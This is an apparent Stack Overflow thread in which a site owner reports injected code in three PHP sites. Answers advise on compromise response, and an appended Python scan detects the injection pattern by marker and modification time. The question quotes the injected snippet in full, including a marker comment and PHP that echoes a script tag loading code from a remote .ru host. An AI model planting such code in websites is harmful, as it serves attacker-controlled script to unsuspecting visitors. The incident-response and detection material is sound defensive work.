I have three PHP websites. Two of them are on the same hosting and one is on another host. All three websites had code injected into controller, config and model files at the same time, like this:

#266a81#
if(empty($nwu)) {
$nwu = "<script type=\"text/javascript\" src=\"http://allinclusivetravel.ru/w96rnjzc.php?id=1709100\"></script>";
echo $nwu;
}

I want to know the reason and the solution for that, please.

halfer
Alaa

2 Answers

If they have injected code directly into your source files, your host account or server has been compromised. Change all your credentials, SSH keys, etc., and contact your hosting immediately.

You will have to manually remove all the code they injected.

John Cartwright
  • I removed the code from the sites, but I want to know where it came from, and how can I know if it will come another time in the future or not? – Alaa Jun 06 '15 at 12:59
  • I can't possibly answer this. You have an exploit either in your code, or your server. Likely attack vectors are you allowed a script to be uploaded which allows remote execution of code. There are a million possible reasons. – John Cartwright Jun 06 '15 at 14:01
  • Regarding "manually removing" code - surely the best advice is to restore the code from version control? Or, if version control is not in use, backup? Of course, anyone in this situation will also have to work out how the attackers got in as well, so as not to have the situation happen again. – halfer Oct 10 '15 at 08:32
Maybe I did not understand, you have to remove the tag? If so, you can try this: remove script tag from HTML content

Community
Scream
  • I want to know the reason?? I already removed the code from all the sites, but I don't know where it comes from!! – Alaa Jun 06 '15 at 12:58
  • If it's present in all pages I think that your server has been hacked. Check system logs and the last modified date of all files. – Scream Jun 07 '15 at 05:54
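
Following the suggestion above to check the last modified date of all files, this scan finds PHP files carrying the marker-plus-remote-script pattern shown in the question and groups them by modification time. It is an added example, not code from any poster; the marker regex (`#`, six hex digits, `#`) is an assumption generalized from the single `#266a81#` sample, and all function names are hypothetical.

```python
import os
import re
import sys
import time

# Assumption: marker is '#' + 6 hex digits + '#' on its own line (from #266a81#).
MARKER_RE = re.compile(rb"^[ \t]*#[0-9a-f]{6}#[ \t\r]*$", re.M)
# A quoted PHP string that starts with a <script> tag loading from a remote host.
REMOTE_SCRIPT_RE = re.compile(
    rb"""["']<script[^>]*src=\\?["']https?://([^/"'\\]+)""", re.I)
PHP_EXTS = (".php", ".phtml", ".inc")

def scan_file(path):
    """Return a hit record if the file carries a marker or a remote-script string."""
    with open(path, "rb") as fh:
        data = fh.read()
    markers = [m.group(0).strip().decode() for m in MARKER_RE.finditer(data)]
    hosts = [m.group(1).decode("ascii", "replace")
             for m in REMOTE_SCRIPT_RE.finditer(data)]
    if not markers and not hosts:
        return None
    return {"path": path, "mtime": os.path.getmtime(path),
            "markers": markers, "hosts": hosts}

def scan_tree(root):
    """Scan every PHP-like file under root; hits come back oldest first."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(PHP_EXTS):
                hit = scan_file(os.path.join(dirpath, name))
                if hit:
                    hits.append(hit)
    return sorted(hits, key=lambda h: h["mtime"])

def mtime_clusters(hits, window=300):
    """Group hits modified within `window` seconds of the previous hit."""
    clusters = []
    for h in hits:
        if clusters and h["mtime"] - clusters[-1][-1]["mtime"] <= window:
            clusters[-1].append(h)
        else:
            clusters.append([h])
    return clusters

if __name__ == "__main__":
    for group in mtime_clusters(scan_tree(sys.argv[1])):
        print(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(group[0]["mtime"])))
        for h in group:
            print("   ", h["path"], h["markers"], h["hosts"])
```

Modification times can be reset by whoever wrote to the files, so treat each cluster as a pointer to the log window worth reading, and confirm the list of changed files against version control or a backup.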